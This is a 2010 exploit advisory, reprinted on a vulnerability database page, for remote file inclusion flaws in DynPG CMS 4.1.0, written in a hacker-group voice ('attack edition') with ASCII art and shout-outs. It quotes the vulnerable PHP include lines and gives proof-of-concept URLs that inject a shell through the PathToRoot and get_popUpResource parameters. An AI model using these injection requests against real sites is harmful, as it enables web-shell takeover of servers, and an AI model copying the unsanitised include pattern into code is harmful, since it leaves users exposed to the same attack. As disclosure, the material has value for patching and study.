Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23512
HistoryApr 05, 2010 - 12:00 a.m.

DynPG CMS Multiple Remote File Inclusion Vulnerability

2010-04-0500:00:00
vulners.com
63
JSON

########################################################

fucking the Web Apps [attack edition]

/\ `\ /\ \ __ /\ \__/\ \
\ \ \L\\__ __ \ \ \/'\ /\\ ___ __ \ \ ,\ \ \__ __
\ \ \/\ \/\ \ /'\ \ , < \/\ \ /' _ `\ /' `\ \ \ \/\ \ _ `\ /'`\
\ \ \/\ \ \_\ \/\ \/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \\ \ \ \ \/\ __/
\ \\ \ \/\ \\\ \\ \\ \\ \\ \\ \___ \ \ \\\ \\ \\ \\
\// \// \// \//\//\//\//\//\/L\ \ \// \//\//\//
/\/
\_//
__ __ __ ______ Hack0wn! Security Project
/\ \ /\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ \ \ \ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'`\ \ '`\ \ \ __ \/\ '`\/\ '`\ /',\
\ \ \/ \\ \/\ /\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\, `\
\ `\x/\ \___\\ \,/ \ \\ \\ \ ,/\ \ ,/\/\____/
'\//// \// \// \//\//\ \ \/ \ \ \/ \//
\ \\ \ \\
\// \/_/

[+]Title : DynPG CMS Multiple Remote File Inclusion Vulnerability
[+]Version: 4.1.0 (Other or lower versions may also be affected)
[+]Download: http://www.dynpg.org/download_en.php
[+]License: GNU / GPL
[+]Metode : Remote File Inclusion
[+]Author: eidelweiss

    [*]Special to Syabilla_putri &#40;I miss u so much to&#41;[*]

    [!]Thank&#96;s Fly To:

[~] Jose Luis Gongora Fernandez a.k.a JosS
[~] exploit-db team (loneferret - Exploits - dookie2000ca)
[~] r0073r & 0x1D , [D]eal [C]yber

########################################################

Description:

DynPG is used to upload and manage dynamic web content similar to other content management systems.
DynPG however differs from other CMS, because it is embedded directly into websites.
The software was originally developed to realize designs that are created with Adobe Photoshop, Adobe Fireworks, Adobe Illustrator or any
other graphics software.
The layout is created with an editor like Adobe Dreamweaver or Adobe GoLive or even as simple code.
After that, code snippets are placed at those points, where dynamically generated content (like articles, galleries, blogs or other
dynamic content) shall be generated.
It provides a convenient way to extend existing websites with dynamic content. DynPG provides a template engine, but also supports
existing CSS layouts.

########################################################

    -=[ Vuln C0de ]=-

[!] counter.php

            require_once $GLOBALS[&quot;DefineRootToTool&quot;].&quot;config.php&quot;; // line 15
            require_once $GLOBALS[&quot;DefineRootToTool&quot;].&quot;connectdb.php&quot;;      // line 16

[!] /plugins/DPGguestbook/guestbookaction.php

<?php
function dynPG_Guestbook_proceedREQ()
{
require_once $GLOBALS['DynPG']->PathToRoot .'config.php';
require_once $GLOBALS['DynPG']->PathToRoot .'defines.php';
require_once $GLOBALS['DynPG']->PathToRoot .'connectdb.php';

[!] /backendpopup/popup.php

    require &#39;./resources/&#39; . $get_popUpResource . &#39;/index.res.php&#39;; // line 36

[!] etc , etc , etc

    -=[ Proof Of Concept ]=-
    
    http://127.0.0.1/DynPG_path/plugins/DPGguestbook/guestbookaction.php?PathToRoot= [inject0r sh3ll]
    http://127.0.0.1/DynPG_path/backendpopup/popup.php?get_popUpResource= [inj3ct0r sh3ll]

    etc , etc , etc

######################=[E0F]=#############################

JSON